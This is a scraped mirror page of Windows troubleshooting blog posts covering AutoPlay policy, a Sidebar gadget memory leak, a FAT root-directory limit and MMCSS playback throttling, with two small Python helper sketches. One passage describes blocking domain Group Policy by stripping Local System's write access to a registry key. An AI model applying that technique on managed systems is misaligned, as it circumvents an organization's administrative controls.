original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696764/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121003iE9336E5A8B48817E" style="WIDTH: 550px; HEIGHT: 119px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The queries of the first two locations resulted in NAME NOT FOUND errors, indicating that the policies weren’t defined, but a query of HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun was successful. Process Monitor showed the value Explorer had read in the Details column: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="107" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696766/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696766/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121004iD36F3F0CDDCF4DDD" style="WIDTH: 251px; HEIGHT: 107px" width="251" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I didn’t know how to interpret a setting of 255, so I executed a Web search for “nodrivetypeautorun” and found <A class="" href="#" mce_href="#" target="_blank"> a page </A> in the Windows 2000 Resource Kit </FONT> <FONT face="Calibri" size="3"> that describes the value as a bitmask specifying which device types have AutoPlay disabled. 
A value of 255 decimal (0xFF hexadecimal) disables AutoPlay on all devices: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="119" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696767/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696767/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121005iD6003E07A529611E" style="WIDTH: 360px; HEIGHT: 119px" width="360" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I used Process Monitor’s Jump-To functionality to launch Regedit and navigate directly to the value, opened the value editor, and changed the setting to 0 to enable AutoPlay on all devices. Next I had to test the change. I removed and reinserted the key and, to my satisfaction, the AutoPlay dialog appeared. Note that on Windows Vista, AutoPlay no longer means "automatically execute what's in Autorun.inf", but rather, "show me my options", so I wasn't introducing a potential security issue. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The case was almost closed, but I had one detail to wrap up. AutoPlay was disabled on my system by the Group Policy configuration of the Microsoft domain to which the system is joined. That explained why the demonstration had worked the first few times: my first deliveries of the session were before I had joined Microsoft. It also meant that the value would get restored to its previous setting the next time I logged on and Group Policy reapplied the domain’s configuration. If I happened to log on before the session, the demonstration would break again. 
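</FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> For readers who want to interpret a NoDriveTypeAutoRun value themselves, the following is a minimal sketch of decoding the bitmask described above. The bit-to-drive-type table is an assumption based on the drive type numbering returned by GetDriveType (values 0 through 6, one bit each, with the top bit treated as reserved), so check it against the policy documentation before relying on it; the function and table names are made up for illustration. </FONT> </P>

```python
# Assumed layout: bit n corresponds to GetDriveType value n (0..6);
# bit 7 is treated here as reserved / unknown.
DRIVE_TYPE_BITS = {
    0x01: "unknown type",
    0x02: "no root directory",
    0x04: "removable",
    0x08: "fixed",
    0x10: "network",
    0x20: "CD-ROM",
    0x40: "RAM disk",
    0x80: "reserved / unknown",
}


def autoplay_disabled_types(mask):
    """Return the drive types whose AutoPlay-disable bit is set in the mask."""
    return [name for bit, name in DRIVE_TYPE_BITS.items() if mask & bit]


# 0xFF is the value from the trace; 0x91 is just an example mask; 0 is the fix.
for value in (0xFF, 0x91, 0x00):
    disabled = autoplay_disabled_types(value)
    print(f"0x{value:02X}:", ", ".join(disabled) if disabled else "AutoPlay enabled for all types")
```

<P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> With every bit set, as in the 0xFF value from the trace, all eight entries are reported as disabled, and a value of 0 reports none. 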
</FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> There’s no way to opt out of Group Policy updates short of removing the system from the domain or never connecting to the domain. However, because I have local administrative rights, I realized that I could prevent Group Policy from changing the value by setting the permissions on the policy’s key such that Group Policy wouldn’t have permission to do so. Group Policy processing occurs in the Local System account, so I opened Regedit’s permissions editor and removed write access for the Local System account: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="371" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696768/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696768/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121006iBE487CE107D4D621" style="WIDTH: 294px; HEIGHT: 371px" width="294" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I was now confident that the demonstration would work for my current delivery of the Vista Kernel Changes session, as well as any future ones, and I closed the case. Besides highlighting Process Monitor’s usefulness for uncovering a root cause, this example also illustrates the power of local administrative rights. A local administrator is the master of the computer and is able to do anything they want, including circumventing domain policies, something I covered in a <A class="" href="#" mce_href="#" target="_blank"> previous blog post </A> , and that's just one more reason enterprises should strive to have their end users run as standard users. 
</FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:37:12 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-missing-autoplay/ba-p/723613 MarkRussinovich 2019-06-27T06:37:12Z The Case of the Frozen Clock Gadget https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-frozen-clock-gadget/ba-p/723605 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Oct 15, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Besides Aero Glass, one of the most visible features of Windows Vista is the Sidebar with its set of default Gadgets, like the clock, RSS feed, and photo viewer. The convenience of having frequently-accessed information on the desktop and the ease of their development has led to the availability of literally thousands of third-party Gadgets through sites like the <A class="" href="#" mce_href="#" target="_blank"> Windows Vista Gadget Gallery </A> </FONT> <FONT face="Calibri" size="3"> . I’ve downloaded and installed a few out of curiosity, and in some cases kept them in my Sidebar’s standard configuration, and never experienced a problem. <SPAN style="mso-spacerun: yes"> </SPAN> A few days after installing a batch of new Gadgets, however, I noticed that a third-party clock Gadget had stopped updating, and so I set out to investigate. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> My system was otherwise functioning normally, so my first step was to see if something was amiss with the Sidebar’s configuration. 
I right-clicked on the Sidebar screen area and selected the Properties menu item, but instead of displaying the Sidebar configuration dialog, the Sidebar crashed: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="291" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178594/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178594/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120992iEB70A1509CA2F74D" style="WIDTH: 484px; HEIGHT: 291px" width="484" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Gadgets run inside of shared Sidebar processes, so my first thought was that memory corruption in the Sidebar process had caused both the stopped clock and the subsequent crash. Verifying that theory required that I analyze the crash. The Windows Error Reporting (WER) service creates a crash-dump file, which is the saved state of a faulting process, in case you agree to send information to Microsoft about a problem. 
I clicked open the View Details area to see where Windows had saved the dump: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="375" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178596/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178596/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120993i987318845BCBB51D" style="WIDTH: 440px; HEIGHT: 375px" width="440" /> </FONT> </P> <SPAN style="mso-no-proof: yes"> </SPAN> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The last path displayed by the dialog, WERD8EE.tmp.mdmp, is a dump file, so I launched the <A class="" href="#" mce_href="#" target="_blank"> Microsoft Debugging Tools for Windows Windbg </A> </FONT> <FONT face="Calibri" size="3"> utility and opened the file. When you open a dump file, Windbg automatically shows you the instruction that ultimately led to the crash. In this case, it was a memory copy operation in Msvcrt, the Microsoft C Runtime: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="92" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178598/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178598/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120994iA0052B0681635540" style="WIDTH: 550px; HEIGHT: 92px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The right side of the line showing the instruction indicates that the target address of the copy is 0. 
When a memory resource is exhausted, memory-allocation functions typically return address 0, also known as a NULL pointer, because that’s an illegal address by default for a Windows process (an application can manually create read/write memory at address zero, but in general it’s not done). The fact that Sidebar referenced address 0 didn’t conclusively mean the crash was due to low-memory instead of corruption, but it appeared likely. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I next looked at the code that led to the crash, which would tell me if it was a Gadget or the Sidebar itself that had passed a NULL pointer to the C Runtime. To do so, I opened Windbg’s stack dialog: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="303" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178601/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178601/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120995i0D14989A51DBE9E9" style="WIDTH: 497px; HEIGHT: 303px" width="497" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I had previously configured Windbg’s symbol path to point at the <A class="" href="#" mce_href="#" target="_blank"> Microsoft symbol server </A> </FONT> <FONT face="Calibri" size="3"> so that Windbg reports names of internal functions in Windows images, because knowing function names can often make understanding a dump file easier. The functions listed in the stack trace implied that Sidebar was querying the version of a “package” when it crashed. I’m not sure what the Sidebar calls a package, but the trace did seem to show that Sidebar was the culprit, not a Gadget. 
</FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> So had Sidebar run out of memory? There are several types of resource exhaustion that can cause a memory allocation to fail. For example, the system could have run out of committable memory, the process could have consumed all the memory in its own address space, or an internal heap could have reached its maximum size. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I started by checking the committed memory, since that was quick. Total committable memory, also known as the commit limit, is the sum of the paging file(s) and most of physical memory. When committable memory runs low, Windows Vista’s low-resource watchdog warns you by presenting a list of processes consuming the most memory and gives you the option of terminating them to relieve the memory pressure. I hadn’t seen a warning, so I doubted that this was the cause, but opened <A class="" href="#" mce_href="#" target="_blank"> Process Explorer’s </A> System Information dialog to check anyway: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="130" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178602/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178602/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120996i265B7740F8992DB1" style="WIDTH: 191px; HEIGHT: 130px" width="191" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> As I suspected, there was plenty of available committable memory. I next looked at Sidebar’s virtual memory usage. 
Memory leaks are caused when a process allocates virtual memory, stores some data in it, uses the data, but doesn’t free the memory when it’s done with the data. Virtual memory that processes allocate to store their own data is called Private Bytes, so I opened Process Explorer and added the Private Bytes column: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="227" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178605/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178605/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120997iE1BCDDF4F76B4E1F" style="WIDTH: 550px; HEIGHT: 227px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> On a 32-bit Windows system, processes have 2 GB of address space available to them by default, so the highest possible Private Bytes value is close to 2 GB, which is exactly what the Sidebar process with process ID 4680 had consumed. That confirmed it: a memory leak in Sidebar caused it to run out of address space, which in turn caused a memory allocation to fail, which finally caused a NULL-pointer reference and a crash. I suspect that the clock stopped when Sidebar’s address space was exhausted and the clock Gadget couldn’t allocate resources to update its graphic. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Next I had to determine which Gadget was causing the leak, which may or may not have been the frozen clock Gadget. The Sidebar consists of two processes, one Sidebar.exe process that hosts the Windows Gadgets and a child Sidebar.exe process for third-party Gadgets. 
At this point I knew that a third-party Gadget had leaked memory or caused the Sidebar to leak, but I had several third-party Gadgets running and I didn’t know which one to blame. Unfortunately, the Sidebar offers no way to track memory usage by Gadget (or any other resource usage for that matter), so I had to apply manual steps to isolate the leak. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> After restarting the Sidebar, I removed the third-party Gadgets and added them back one at a time, leaving each to run for a minute or two while I monitored Sidebar’s Private Bytes usage. I added the Private Bytes Delta column to Process Explorer’s display to make it easy to spot increases, and after adding one of the Gadgets I started to see periodic positive Private Bytes Delta values, implicating it as the leaker: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="207" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178606/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178606/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120998i583249DDA2F1A43C" style="WIDTH: 550px; HEIGHT: 207px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Now that I knew the guilty Gadget, I could have simply uninstalled it and considered the case closed. But I was curious to know how the Gadget had managed to cause a leak in the Sidebar – a leak that persisted even after I removed the Gadget. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I navigated to the Gadget’s install directory and opened its HTML file to see what it was doing. 
The Gadget consists of around three dozen lines of fairly simple JavaScript and I didn’t spot anything amiss. To narrow in on the problematic code, I began commenting out pieces and re-adding the Gadget to the Sidebar until the leak disappeared. The code I was left with was a function the Gadget configured to execute every 10 seconds to update its graphics. It called the Sidebar background object’s <A class="" href="#" mce_href="#" target="_blank"> RemoveObjects </A> </FONT> <FONT face="Calibri" size="3"> method and then added back graphics and text by calling the background’s <A class="" href="#" mce_href="#" target="_blank"> AddImageObject </A> </FONT> <FONT face="Calibri" size="3"> method. Here’s a simplified version of the relevant code: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="128" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178608/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178608/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120999iF7A89781628F8193" style="WIDTH: 358px; HEIGHT: 128px" width="358" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The fact that it was using these APIs correctly meant that the leak was in the Sidebar’s code, but a quick Internet search didn’t turn up any mentions of a leak in the background object. If Sidebar APIs had a memory leak, why wasn’t it well known? I scanned the source code of the other Gadgets on my system and discovered that none of them used the APIs, which explained why the leak isn’t commonly encountered. 
However, comments in the Windows Gadget Gallery for the Gadget that inadvertently caused the leak revealed that other users had noticed it. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Having tracked the original unresponsive Gadget problem down to a leaky Sidebar API, I filed a bug in the Windows bug database and closed the case. </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:36:22 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-frozen-clock-gadget/ba-p/723605 MarkRussinovich 2019-06-27T06:36:22Z The Case of the Failed File Copy https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-failed-file-copy/ba-p/723596 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Oct 01, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The other day a friend of mine called me to tell me that he was having a problem copying pictures to a USB flash drive. 
He’d been able to copy over two hundred files when he got this error dialog, after which he couldn’t copy any more without getting the same message: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="405" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2087391/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2087391/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120988i5C395F93F7F56CFC" style="WIDTH: 550px; HEIGHT: 405px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Unfortunately, the message, “The directory or file cannot be created”, provides no clue as to the underlying cause and the dialog explains that the error is unexpected and does not suggest where you can find the “additional help” to which it refers. <SPAN style="mso-spacerun: yes"> </SPAN> My friend was sophisticated enough to make sure the drive had plenty of free space and he ran Chkdsk to check for corruption, but the scan didn’t find any problem and the error persisted on subsequent attempts to copy more files to the drive. At a loss, he turned to me. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I immediately asked him to capture a trace with </FONT> <A href="#" target="_blank"> <FONT face="Calibri" size="3"> Process Monitor </FONT> </A> <FONT face="Calibri" size="3"> , a real-time file system and registry monitoring tool, which would offer a look underneath the dialogs to reveal actual operating system errors returned by the file system. <SPAN style="mso-spacerun: yes"> </SPAN> He sent me the resulting Process Monitor PML file, which I opened on my own system. 
After setting a filter for the volume in question to narrow the output to just the operations related to the file copy, I went to the end of the trace to look back for errors. I didn’t have to look far, because the last line appeared to be the operation with the error causing the dialog: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="295" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2087396/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2087396/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120989iA41E85A542B194CA" style="WIDTH: 550px; HEIGHT: 295px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> To save screen space, Process Monitor strips the “STATUS” prefix from the errors it displays, so the actual operating system error is STATUS_CANNOT_MAKE. <SPAN style="mso-spacerun: yes"> </SPAN> I’d never seen or even heard of this error message. In fact, the version of Process Monitor at the time showed a raw error code, 0xc00002ea, instead of the error’s display name, and so I had to look in the Windows Device Driver Kit’s Ntstatus.h header file to find the display name and add it to the Process Monitor function that converts error codes to text. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> At that point I could have cheated and searched the Windows source code for the error, but I decided to see how someone without source access would troubleshoot the problem. 
A Web search took me to this old </FONT> <A href="#" target="_blank"> <FONT color="#0000ff" face="Calibri" size="3"> thread </FONT> </A> <FONT face="Calibri" size="3"> in a newsgroup for Windows file system developers: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="243" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2087406/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2087406/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120990i901BF2657A35D98E" style="WIDTH: 550px; HEIGHT: 243px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Sure enough, the volume was formatted with the FAT file system and the number of files on the drive, including those with long file names, could certainly have accounted for the use of all 512 available root-directory entries. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I had solved the mystery. I told my friend he had two options: he could create a subdirectory off the volume’s root and copy the remaining files into there, or he could reformat the volume with the FAT32 file system, which removes the limitation on entries in the root directory. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> One question remained, however. Why was the volume formatted as FAT instead of FAT32? The answer lies with both the USB drive makers and the Windows Format dialog. 
I’m not sure what convention the makers follow, but my guess is that many format their drives with FAT simply because it’s the file system guaranteed to work on virtually any operating system, including those that don’t support FAT32, like DOS 6 and Windows 95. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> As for Windows, I would have expected it to always default to FAT32, but a quick look at the Format dialog’s pick for one of my USB drives showed I was wrong: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="462" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2087416/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2087416/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120991i8088D6FCE1E7678D" style="WIDTH: 267px; HEIGHT: 462px" width="267" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I couldn’t find the guidelines used by the dialog anywhere on the Web, so I looked at the source and found that Windows defaults to FAT for non-CD-ROM removable volumes that are smaller than 4GB in size. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I’d consider this case closed, but I have two loose ends to follow up on: see if I can get the error message fixed so that it’s more descriptive, and lobby to get the default format changed to FAT32. </FONT> </P><P> <FONT face="Calibri" size="3"> Wish me luck. 
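</FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> To make the root-directory arithmetic from this case concrete, here is a minimal Python sketch. It assumes the 512-entry root directory mentioned above and the standard long-file-name layout, in which each long-name entry holds up to 13 characters and every file also needs one 8.3 entry. The function names and the has_short_name_form flag are hypothetical, and the sketch ignores the volume label and any files already on the drive, so treat the results as rough upper bounds rather than exact limits. </FONT> </P>
<PRE>
```python
import math

ROOT_ENTRIES = 512        # root-directory size cited in the article for FAT
CHARS_PER_LFN_ENTRY = 13  # each long-file-name entry stores up to 13 characters


def entries_for_name(name, has_short_name_form=False):
    """Return how many directory entries one file consumes.

    has_short_name_form is a hypothetical flag for names that already fit
    the 8.3 format and therefore need no long-file-name entries.
    """
    if has_short_name_form:
        return 1
    lfn_entries = math.ceil(len(name) / CHARS_PER_LFN_ENTRY)
    return lfn_entries + 1  # long-name entries plus the 8.3 entry itself


def max_files_in_root(name, has_short_name_form=False):
    """Upper bound on files with names like this one in an empty root directory."""
    return ROOT_ENTRIES // entries_for_name(name, has_short_name_form)


print(max_files_in_root("IMG_0001.JPG", has_short_name_form=True))  # prints 512
print(max_files_in_root("Beach 001.jpg"))                            # prints 256
print(max_files_in_root("Summer vacation 2007 001.jpg"))             # prints 128
```
</PRE>
<P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Under these assumptions, even short names that need a single long-name entry halve the number of files that fit in the root, which is consistent with the copy failing after a little over two hundred pictures. 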
</FONT> </P> <P></P> </BODY></HTML> Thu, 27 Jun 2019 06:35:25 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-failed-file-copy/ba-p/723596 MarkRussinovich 2019-06-27T06:35:25Z Vista Multimedia Playback and Network Throughput https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/vista-multimedia-playback-and-network-throughput/ba-p/723591 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Aug 26, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> A few weeks ago a poster with the handle dloneranger </FONT> <A href="#" target="_blank"> <FONT color="#800080" face="Calibri" size="3"> reported </FONT> </A> <FONT face="Calibri" size="3"> in the 2CPU forums that he experienced reduced network throughput on his Vista system when he played audio or video. Other posters chimed in with similar results, and in the last week attention has been drawn to the behavior by other sites, including </FONT> <A href="#" target="_blank"> <FONT face="Calibri" size="3"> Slashdot </FONT> </A> <FONT face="Calibri" size="3"> and Zdnet blogger </FONT> <A href="#" target="_blank"> <FONT color="#800080" face="Calibri" size="3"> Adrian Kingsley-Hughes </FONT> </A> <FONT face="Calibri" size="3"> . </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Many people have correctly surmised that the degradation in network performance during multimedia playback is directly connected with mechanisms employed by the Multimedia Class Scheduler Service (MMCSS), a feature new to Windows Vista that I covered in my three-part TechNet Magazine </FONT> <A href="#" target="_blank"> <FONT color="#800080" face="Calibri" size="3"> article series </FONT> </A> <FONT face="Calibri" size="3"> on Windows Vista kernel changes. Multimedia playback requires a constant rate of media streaming, and playback will glitch or sputter if its requirements aren’t met. 
The MMCSS service runs in the generic service hosting process Svchost.exe, where it automatically prioritizes the playback of video and audio in order to prevent other tasks from interfering with the CPU usage of the playback software: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="379" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833250/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833250/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120983iA593C35CE70C9F0B" style="WIDTH: 308px; HEIGHT: 379px" width="308" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> When a multimedia application begins playback, the multimedia APIs it uses call the MMCSS service to boost the priority of the playback thread into the realtime range, which covers priorities 16-31, for up to 8ms of every 10ms interval, depending on how much CPU the playback thread requires. 
